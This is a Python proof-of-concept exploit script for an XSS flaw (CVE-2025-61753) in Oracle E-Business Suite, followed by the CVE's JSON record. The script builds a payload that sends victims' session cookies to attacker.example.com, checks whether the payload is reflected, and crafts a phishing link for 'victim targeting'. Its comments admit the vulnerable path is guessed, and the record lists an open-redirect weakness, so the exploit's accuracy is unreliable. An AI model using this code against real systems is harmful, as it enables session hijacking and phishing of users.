CVE-2025-61753

# CVE-2025-61753 PoC - Oracle E-Business Suite Oracle Scripting XSS # Vulnerability: Reflected/Stored XSS in Oracle Scripting Miscellaneous component # Affected versions: 12.2.3 - 12.2.14 import requests import urllib.parse TARGET_URL = "https://target-ebs.example.com:8000/OA_HTML/" # The vulnerable endpoint is within the Oracle Scripting Miscellaneous component # Common paths include scripting-related servlets or JSP pages VULNERABLE_PATH = "OA_HTML/OAScriptingMiscServlet" # Example path, actual path may vary def build_xss_payload(): """ Build a basic XSS payload that demonstrates the vulnerability. The payload attempts to steal session cookies or perform unauthorized actions. """ # Simple reflected XSS payload attacker_server = "https://attacker.example.com/collect" payload = f'<script>document.location="{attacker_server}?cookie="+document.cookie</script>' return payload def exploit_reflected_xss(target_url, vulnerable_path, param_name="input"): """ Attempt to exploit reflected XSS by injecting payload into a parameter. """ payload = build_xss_payload() encoded_payload = urllib.parse.quote(payload) url = f"{target_url}{vulnerable_path}?{param_name}={encoded_payload}" print(f"[*] Sending XSS payload to: {url}") try: response = requests.get(url, verify=False, timeout=10) if payload in response.text or encoded_payload in response.text: print("[+] Payload reflected in response - XSS confirmed!") return True else: print("[-] Payload not reflected in response") return False except Exception as e: print(f"[-] Error: {e}") return False def craft_phishing_link(target_url, vulnerable_path, param_name="input"): """ Craft a phishing link that can be sent to victims. """ payload = build_xss_payload() encoded_payload = urllib.parse.quote(payload) phishing_url = f"{target_url}{vulnerable_path}?{param_name}={encoded_payload}" print(f"[*] Phishing URL: {phishing_url}") return phishing_url if __name__ == "__main__": # Step 1: Verify the vulnerability print("[*] Testing CVE-2025-61753 - Oracle Scripting XSS") exploit_reflected_xss(TARGET_URL, VULNERABLE_PATH) # Step 2: Generate phishing link for social engineering attack print("\n[*] Generating phishing link for victim targeting...") craft_phishing_link(TARGET_URL, VULNERABLE_PATH) print("\n[*] Note: Successful exploitation requires user interaction (UI:R)") print("[*] Scope change (S:C) means attack may impact additional Oracle products")

{"cve": {"id": "CVE-2025-61753", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:51.717", "lastModified": "2025-10-24T14:36:15.127", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Scripting product of Oracle E-Business Suite (component: Miscellaneous). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Scripting. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Scripting, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Scripting accessible data as well as unauthorized read access to a subset of Oracle Scripting accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:scripting:*:*:*:*:*:*:*:*", "versionStartIncluding": "12.2.3", "versionEndIncluding": "12.2.14", "matchCriteriaId": "93DEBF82-A97E-4C67-B1DD-49B959ECB143"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}